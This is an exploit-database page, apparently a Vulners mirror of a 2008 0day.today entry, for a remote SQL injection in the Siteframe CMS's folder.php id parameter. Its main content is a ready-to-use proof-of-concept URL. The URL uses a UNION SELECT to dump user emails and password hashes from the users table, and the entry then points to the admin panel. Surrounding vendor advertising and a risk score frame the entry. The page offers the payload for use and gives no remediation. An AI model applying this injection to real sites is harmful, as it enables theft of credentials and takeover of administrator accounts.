Lucene search

K

Siteframe (folder.php id) Remote SQL Injection Vulnerability

🗓️ 18 Jul 2008 00:00:00Reported by n0neType 
zdt
 zdt
🔗 0day.today👁 22 Views

Siteframe remote SQL injection vulnerability in folder.php i

Show more
Code
============================================================
Siteframe (folder.php id) Remote SQL Injection Vulnerability
============================================================



###############################
#Vulnerable script: folder.php#
#Vulnerable var: id############
####################

########################################
#CMS Homepage: http://www.siteframe.org#
########################################

##########################################################################################################################################################
#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--#                                                                                                                                                                                           ########################################################################################################################
##########################################################################################################################################################

#########################################################################################################
#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
#########################################################################################################

###################################################



#  0day.today [2018-01-04]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1
22
.json
Report